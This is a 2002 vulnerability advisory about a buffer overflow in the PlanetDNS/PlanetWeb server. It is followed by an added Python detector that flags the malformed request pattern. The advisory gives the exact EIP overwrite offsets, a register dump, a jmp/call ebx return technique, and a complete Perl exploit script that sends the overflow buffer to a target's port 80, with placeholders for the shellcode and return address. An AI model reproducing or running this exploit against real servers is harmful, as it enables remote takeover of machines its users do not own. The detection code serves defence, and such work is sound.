
New buffer overflow in PlanetDNS

by Nikola Strahija on October 18th, 2002

PlanetDNS (http://www.planetdns.net) is a commercial software package that turns a computer into an Internet server: it lets the user create an Internet name and run a web server, FTP server, mail server, etc. on that computer.


PlanetDNS is vulnerable to a buffer overflow that overwrites EIP (not posted before). It had already been reported that a request of 1024 bytes could crash the server; I found that sending a run of 6500 bytes (without a leading GET /) overwrites EIP and so allows execution of a shellcode. The overwrite lands on bytes 6449, 6450, 6451 and 6452.
One also notices that EBX always points 4 bytes before EIP, so the return address can be a jmp ebx or call ebx, which is found in many loaded modules.
I wrote an exploit, tested on PlanetWeb v1.14, which leaves the registers in the following state:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=43434343 edx=7846f5b5 esi=0217dfd8 edi=00000000
eip=43434343 esp=0217df18 ebp=0217df38 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
# tool bop.pl
# buffer overflow tested against PlanetWeb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (especially christal... the less hard you pedal, the less fast you go..)
#

use IO::Socket;
if ($#ARGV < 0) {
    print "\n write the target IP!! \n\n";
    exit;
}

$shellcode = "YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  # add your favourite shellcode
$buffer  = "A" x 6444;               # filler up to the 4 bytes that EBX points at
$ebx     = "\x90\xEB\x08\x90";       # EBX = EIP - 4: nop; jmp short +8; nop
$ret     = "\x43\x43\x43\x43";       # insert your ret address (a jmp ebx or call ebx)
$minibuf = "\x90\x90\x90\x90";       # skipped by the EB 08 jump
$connect = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80");
unless ($connect) { die "cant connect $ARGV[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";
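As an added, defender-side example (not part of the original advisory or the vendor's code): a small Python classifier for the malformed request pattern described above, the kind of check a proxy or IDS in front of the TCP/80 listener could apply. It assumes that legitimate request lines stay under 512 bytes (an assumption), uses the 1024-byte crash size and the 6449..6452 EIP offsets quoted in the advisory, and runs over constructed sample inputs only.

```python
import re
from collections import Counter

CRASH_LEN = 1024       # request size the advisory says crashes the server
EIP_OFFSET = 6449      # 1-based offset of the saved EIP bytes (6449..6452)
FIRST_LINE_MAX = 512   # assumed upper bound for a legitimate request line
REQUEST_LINE = re.compile(rb"^[A-Z]{3,7} \S+ HTTP/1\.[01]\r?\n")

def dominant_byte(buf: bytes):
    """Hex of a byte filling >= 90% of buf (overflow padding), else None."""
    if not buf:
        return None
    value, count = Counter(buf).most_common(1)[0]
    return f"{value:02x}" if count * 10 >= len(buf) * 9 else None

def classify_request(data: bytes) -> dict:
    """Classify the opening bytes of one connection to the web listener.
    The advisory's trigger is a long run with no request line, so measure
    what arrives before the first newline against the quoted sizes."""
    nl = data.find(b"\n")
    first_line = data if nl < 0 else data[: nl + 1]
    run = len(first_line)
    well_formed = REQUEST_LINE.match(first_line) is not None
    result = {"first_line_len": run, "well_formed": well_formed,
              "filler_byte": dominant_byte(first_line)}
    if run >= EIP_OFFSET + 3:
        # Enough data reaches the saved return address: log the four bytes
        # that would land in EIP (the "43434343" of the register dump).
        result["verdict"] = "eip_overwrite"
        result["ret_bytes"] = data[EIP_OFFSET - 1:EIP_OFFSET + 3].hex()
    elif run >= CRASH_LEN:
        result["verdict"] = "crash_size"
    elif well_formed and run <= FIRST_LINE_MAX:
        result["verdict"] = "ok"
    else:
        result["verdict"] = "malformed"
    return result

# Constructed samples (not captured traffic): a normal request, the
# 1024-byte crasher, and a buffer laid out like the advisory's (filler,
# 4 bytes where EBX points, "CCCC" at 6449..6452, then padding).
NORMAL = b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n"
CRASHER = b"A" * CRASH_LEN
OVERWRITE = b"A" * 6444 + b"\x90" * 4 + b"CCCC" + b"\x90" * 8

if __name__ == "__main__":
    for name, sample in (("normal", NORMAL), ("crasher", CRASHER), ("overwrite", OVERWRITE)):
        print(name, classify_request(sample))
```

The "ret_bytes" field is what makes an alert actionable: a value such as 43434343 matches the EIP in the dump above, while an address inside a loaded module indicates a crafted return rather than a probe.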

